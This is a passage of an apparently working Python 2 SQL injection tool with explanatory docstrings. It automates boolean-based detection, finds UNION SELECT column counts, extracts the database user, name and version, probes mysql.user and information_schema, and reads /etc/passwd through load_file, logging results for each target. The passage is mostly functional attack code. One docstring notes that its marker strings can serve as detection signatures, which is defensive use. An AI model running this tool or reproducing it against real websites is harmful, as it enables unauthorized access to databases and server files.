 Markers used here: 0x334d50335a3452 is "3MP3Z4R" (outer delimiter for the
 three values, which are separated by K0BRA and split on it below),
 char(69,82,84,79,82,56,53,52) is "ERTOR854" (load_file probe), and hextest
 0x2f6574632f706173737764 is "/etc/passwd".  All of these strings are fixed
 across runs and suitable as detection signatures.  ``otraweb`` is just an
 alias of *web*.
 """
 pass1,pass2 = bypass(passx)
 otraweb = web
 print "\n[+] Searching more data\n"
 hextest = "0x2f6574632f706173737764"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  # Split yields ['', user, database, version, ''] when the echo is complete;
  # a truncated echo makes datar[1..3] raise IndexError (caught in menu()).
  datar = re.split("K0BRA",datax[0])
  savefile("logs/"+gethost(web)+".txt","")
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on"
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
 codetres = toma(web2)
 if (re.findall("ERTOR854",codetres)):
  print "[+] load_file() : on"
  savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")
  427.  
def findlength(web,passx):
 """Grow a UNION SELECT from 2 up to 29 columns until one column is echoed
 back between K0BRA markers, then build the working URL (with the echoed
 position replaced by the ``hackman`` placeholder), log it and hand it to
 menu().

 menu() never returns normally (every branch recurses or exits), so the
 "Length dont found" message and reiniciar() are reached only when no column
 count between 2 and 29 produced an echo.
 """
 pass1,pass2 = bypass(passx)
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
   menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
 print "[-] Length dont found\n"
 reiniciar()
  449.  
def scan(web,passx):
 """Boolean check: fetch *web* with ``and 1=0`` and with ``and 1=1`` and
 treat any difference between the two bodies as a positive.

 The comparison is a plain byte equality, so any content that changes
 between two fetches (not only injection-related output) also counts as
 "detected".  On a positive, or when the user answers "y", control passes
 to findlength(); any other answer restarts via reiniciar().
 """
 pass1,pass2 = bypass(passx)
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
 codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)

 if not code==codedos:
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  op = raw_input("\n[+] Scan anyway y/n : ")
  if op == "y":
   findlength(web,passx)
  elif op == "n":
   reiniciar()
  else:
   # Same outcome as "n"; the branch exists only for readability.
   reiniciar()
  468.  
def sta():
 """Entry prompt: ask for a target URL and a comment style, then either go
 straight to menu() (if the URL already contains ``hackman``, matched
 case-insensitively) or run scan().

 The bare except around scan() reports "Web offline" for every exception
 type -- network errors, but also KeyboardInterrupt and any bug inside
 scan()/findlength() -- and restarts through reiniciar().
 """

 clean()
 header()

 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 if (re.findall("hackman",web,re.I)):
  menu(web,bypasx)
 else:
  try:
   scan(web,bypasx)
  except:
   print "\n[-] Web offline"
   reiniciar()
  484.  
# Script entry point.  There is no ``if __name__ == "__main__"`` guard, so
# importing this module also creates logs/ and starts the interactive prompt.
installer()
sta()
  487.  
  488. #The End
  489.